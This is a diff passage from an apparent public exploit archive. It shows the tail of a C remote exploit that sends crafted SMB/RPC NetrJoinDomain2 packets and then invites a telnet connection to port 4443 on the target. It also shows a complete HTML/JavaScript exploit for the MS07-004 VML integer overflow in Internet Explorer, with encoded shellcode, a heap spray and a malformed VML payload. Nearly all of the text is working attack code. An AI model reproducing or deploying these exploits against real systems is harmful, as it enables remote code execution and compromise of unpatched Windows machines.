-
+
-
+
- //rpc bind
+ //rpc bind
-
+
- memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
+ memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
- memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
+ memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
- memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
+ memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
- *(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);
+ *(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);
-
+
- ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
+ ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
- if (ret<=0)
+ if (ret<=0)
- {
+ {
- printf("send Rpc_Bind_Wkssvc error!\n");
+ printf("send Rpc_Bind_Wkssvc error!\n");
- return;
+ return;
- }
+ }
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
+
-
+
- MakeAttackPacket((char *)argv[2]);
+ MakeAttackPacket((char *)argv[2]);
-
+
-
+
- memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2);
+ memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2);
- memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2);
+ memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2);
- memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2);
+ memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2);
- *(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4);
+ *(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4);
-
+
- *(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58;  //update Total Data Count
+ *(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58;  //update Total Data Count
- *(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58;  //update Data Count
+ *(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58;  //update Data Count
- *(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47;  //update Byte Count
+ *(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47;  //update Byte Count
- *(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58;  //update Frag Length
+ *(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58;  //update Frag Length
-
+
- ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0);
+ ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0);
- if (ret<=0)
+ if (ret<=0)
- {
+ {
- printf("send Rpc_NetrJoinDomain2 error!\n");
+ printf("send Rpc_NetrJoinDomain2 error!\n");
- return;
+ return;
- }
+ }
-
+
- printf("[+] Sent attack packet successfully, Try telnet on %s:4443?\n",argv[1]);
+ printf("[+] Sent attack packet successfully, Try telnet on %s:4443?\n",argv[1]);
-
+
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
+
-
+
-
+
-
+
- closesocket(sock);
+ closesocket(sock);
-
+
-}
+}
-
+
-// milw0rm.com [2006-11-17]
+// milw0rm.com [2006-11-17]
--- a/platforms/windows/remote/3137.html
+++ b/platforms/windows/remote/3137.html
@ -1,194 +1,194 @@
-<!--
+<!--
-
+
-MS07-004 VML integer overflow exploit
+MS07-004 VML integer overflow exploit
-  by lifeasageek at gmail.com
+  by lifeasageek at gmail.com
-
+
- Trigger CVMLRecolorinfo::InternalLoad() method
+- Trigger CVMLRecolorinfo::InternalLoad() method
- you can see the screen captured image "http://picasaweb.google.com/lifeasageek/MS07004/photo?pli=1#5019163989136880322"
+ you can see the screen captured image "http://picasaweb.google.com/lifeasageek/MS07004/photo?pli=1#5019163989136880322"
- which is generated by DarunGrim
+ which is generated by DarunGrim
-
+
- tested on WinXP SP2 Korean version( fully patched except kb929969)  & IE 6.0
+- tested on WinXP SP2 Korean version( fully patched except kb929969)  & IE 6.0
- and I hope it works well in English version
+ and I hope it works well in English version
-
+
- sorry about that exploit hit ratio is only about 1/5
+- sorry about that exploit hit ratio is only about 1/5
- If you have any good idea to improve reliability, please send me an
+ If you have any good idea to improve reliability, please send me an
-e-mail with your idea
+e-mail with your idea
-
+
- all the java script codes scratched from MS06-055 exploit written by Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>
+- all the java script codes scratched from MS06-055 exploit written by Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>
-  and slightly modified
+  and slightly modified
-
+
- 2007.1.15
+- 2007.1.15
-
+
-->
+-->
-
+
-<html xmlns:v="urn:schemas-microsoft-com:vml">
+<html xmlns:v="urn:schemas-microsoft-com:vml">
-
+
-<head>
+<head>
-<object id="VMLRender"
+<object id="VMLRender"
-classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
+classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
-</object>
+</object>
-<style>
+<style>
-v\:* { behavior: url(#VMLRender); }
+v\:* { behavior: url(#VMLRender); }
-</style>
+</style>
-</head>
+</head>
-
+
-<body>
+<body>
-
+
-<SCRIPT language="javascript">
+<SCRIPT language="javascript">
-shellcode =
+shellcode =
-unescape("%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
+unescape("%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
-
+
-bigblock = unescape("%u0505%u0505");
+bigblock = unescape("%u0505%u0505");
-headersize = 20;
+headersize = 20;
-slackspace = headersize+shellcode.length;
+slackspace = headersize+shellcode.length;
-while (bigblock.length<slackspace) bigblock+=bigblock;
+while (bigblock.length<slackspace) bigblock+=bigblock;
-fillblock = bigblock.substring(0, slackspace);
+fillblock = bigblock.substring(0, slackspace);
-block = bigblock.substring(0, bigblock.length-slackspace);
+block = bigblock.substring(0, bigblock.length-slackspace);
-while(block.length+slackspace<0x40000) block = block+block+fillblock;
+while(block.length+slackspace<0x40000) block = block+block+fillblock;
-memory = new Array();
+memory = new Array();
-for (i=0;i<350;i++) memory[i] = block + shellcode;
+for (i=0;i<350;i++) memory[i] = block + shellcode;
-
+
-</script>
+</script>
-
+
-<v:rect style='width:120pt;height:80pt' fillcolor="red" >
+<v:rect style='width:120pt;height:80pt' fillcolor="red" >
-<v:recolorinfo recolorstate="t" numcolors="97612895">
+<v:recolorinfo recolorstate="t" numcolors="97612895">
-
+
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
